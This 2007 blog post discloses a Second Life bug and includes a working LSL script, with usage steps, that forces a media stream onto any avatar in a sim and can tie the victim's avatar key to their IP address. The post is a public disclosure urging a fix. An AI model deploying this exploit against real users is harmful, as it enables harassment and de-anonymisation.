Wednesday, October 24, 2007

How to media grief someone - exploit with code example

Thanks to Stirling Allen for helping me test this one, and for Dizzy Banjo for bringing this to the attention of people, and to the Music-Dev list for going over the technical details. I am publishing this because it is an exploitable bug, and people should know about it until the bug is fixed.

Right now media settings are stored on a sim wide basis. A script can only change media if it is owned by a parcel owner, but it changes on a sim wide basis. The LSL function that changes the settings can be directed at a particular key and that is regardless of where the person is within the sim. Nor are permissions asked for. Here is the exploit:


default
{
state_entry()
{
llListen(55,"",NULL_KEY,"");
}

listen(integer channel,string name,key id,string m)
{
if ( llParcelMediaQuery([PARCEL_MEDIA_COMMAND_TEXTURE]) == [] )
llSay(0, "Lacking permission to set/query parcel media. This object has to be owned by/deeded to the land owner.");

llParcelMediaCommandList( [
PARCEL_MEDIA_COMMAND_URL, "http://www.americafree.tv/unicast_mov/AmericaFreeTVClassics.mov",
PARCEL_MEDIA_COMMAND_AGENT, (key) m,
PARCEL_MEDIA_COMMAND_TEXTURE,(key) "7419658d-b07d-3353-ed87-67b801cb6ff9",
PARCEL_MEDIA_COMMAND_PLAY ] );
}
}


You will need to replace "7419658d-b07d-3353-ed87-67b801cb6ff9" with any texture that you have access to, including public ones, it just happens to be the one I used here.

Now put this script in a group object, set the permissions for the next owner to all permissions. Chat on channel 55, that's just set abitrarily, the key id of the target avatar, who can be anywhere on the sim, and standing on a parcel with no media set.

The avatar's media will be forced to that set up, and will start playing. If the media stream is a site that the griefer controls, then they have just matched a key id to an IP address, because the connection of exposed IP to media is a known security problem.

This exploit has been tested in world, and works.

Oh and you can't turn it back off from your own client if you don't have the ability to set media settings, unless you have a similar script you can run on land that the script has permissions on.

This needs to be fixed.

[UPDATE]

Fixed does not mean removed. This same command feature can be used to let people listen to whatever media they want, and is used in several in world products. For the same reason that huge prims should stay, so should this.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)